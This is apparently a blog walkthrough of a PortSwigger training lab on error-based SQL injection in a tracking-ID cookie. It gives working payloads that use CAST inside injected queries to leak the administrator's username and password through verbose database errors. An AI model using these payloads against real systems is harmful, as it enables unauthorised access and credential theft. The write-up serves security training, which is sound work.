July 6, 2026
Visible error-based SQL injection Lab
This is a walkthrough of PortSwigger Lab: Visible error-based SQL injection lab.
By Hafsa
3 min read
Verbose error: verbose usually means information more than necessary or detail wording. Error which gives user information more than it should is called verbose error.
Sometimes a website gives important data to attackers through verbose error messages, giving away full credentials. If the database is misconfigured, error messages might reveal info of the database which eventually turns Blind Sql Injection to in-band Sql Injection(visible one) where confidential data is compromised.
We will understand this concept practically by doing hands-on lab of the Port Swigger Academy.
The website has Sql injection in tracking ID, intercept the request and send it to repeater.
Let's understand the 2nd picture.
The Tracking Id query is performed something like this:
SELECT * FROM tracking WHERE id='fjwosljg4go'
SELECT * FROM tracking WHERE id='fjwosljg4go''SELECT * FROM tracking WHERE id='fjwosljg4go'
SELECT * FROM tracking WHERE id='fjwosljg4go''When we put a single quotation mark at the end of query, If the id is being interpreted as code it should give an error because we messed up with the syntax. The website showed a 500 error, at the end of the response there is detail info of the error. We can comment out the rest of the query to get rid of the error.
SELECT * FROM tracking WHERE id='fjwosljg4go'--'
(Anything after -- will not be performed)SELECT * FROM tracking WHERE id='fjwosljg4go'--'
(Anything after -- will not be performed)
Now let's retrieve interesting data!
' AND CAST((SELECT 1)as int)--' AND CAST((SELECT 1)as int)--- CAST(): It is a function in Sql which converts one data type to another.
This payload just select 1 and convert it into an integer. Now the reason we are using the CAST() function is because we might be able to retrieve administrator password from the verbose error it shows.
As you can see in the picture, we must use a boolean expression (true or false) with AND function.
' AND 1=CAST((SELECT 1)as int)--' AND 1=CAST((SELECT 1)as int)--
We know that there is a username and password column in a table called users with username administrator. Now what if we ask the query to give us username from the users table. Will the username be revealed in the verbose error? Lets find out.
' AND 1=CAST((SELECT username FROM users)as int)--' AND 1=CAST((SELECT username FROM users)as int)--
"Unterminated string literal started at position 95 in SQL SELECT * FROM tracking WHERE id = 'xcTkamOaxaDHtJEM' AND 1=CAST((SELECT username FROM users)as '. Expected char"
This is giving unterminated string error again even after comment but it looks like there is a character limit because int) — part from the query got cutoff. It means there is some kind of validation which only approve of a specific length of characters. We have to come up with a way to reduce the length. We can delete the tracking id, it is not necessary for the website to work we have cookie session id.
Now we have another error that says more than one row returned it is because our query is comparing 1 to all of the different username in the users table so we will limit it to compare only one which is the first username.
'AND 1=CAST((SELECT username FROM users LIMIT 1)as int)--'AND 1=CAST((SELECT username FROM users LIMIT 1)as int)--
ERROR: invalid input syntax for type integer: "administrator"
The error revealed that the first username is indeed 'administrator'. The query checked is 1 equal to the username administrator? And The CAST() function tried to convert the string administrator to integer which gives the error because the word administrator cannot be converted into integer.
We just have to replace username with password the query itself will reveal the password, if it is in alphabets. Just like it revealed the user named administrator.
'AND 1=CAST((SELECT password FROM users LIMIT 1)as int)--'AND 1=CAST((SELECT password FROM users LIMIT 1)as int)--
In a real world scenerio, verbose error messages can lead to compromised user or company data. It is professional to only show the users what is needed and sanitize the user input to avoid any leaks or other attacks.
We got the password, now log in and the lab is solved!